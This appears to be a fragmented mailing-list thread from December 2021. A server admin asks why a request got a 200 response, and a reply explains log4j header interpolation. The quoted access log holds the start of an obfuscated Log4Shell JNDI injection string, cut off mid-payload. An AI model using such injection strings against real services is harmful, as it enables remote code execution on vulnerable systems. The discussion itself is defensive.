On Mon, 20 Dec 2021 17:49:48 +
Jay Caines-Gooby wrote:
> The request is for your index page "GET / HTTP/1.1"; that's why your
> server responded with 200 OK. The special characters are in the
> referer and user-agent fields, as a log4j system would also try to
> interpolate these, and thus
The request is for your index page "GET / HTTP/1.1"; that's why your server
responded with 200 OK. The special characters are in the referer and
user-agent fields, as a log4j system would also try to interpolate these,
and thus be vulnerable to the exploit.
On Mon, 20 Dec 2021 at 04:02, li...@lazy
On Sun, Dec 19, 2021 at 08:02:08PM -0800, li...@lazygranch.com wrote:
Hi there,
> I don't have any service using java so I don't believe I am subject to
> this exploit. Howerver I am confused why a returned a 200 for this
> request. The special characters in the URL are confusing.
>
> 200 207.24
I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.
200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706
"${${lower:jndi}:${lower:rm
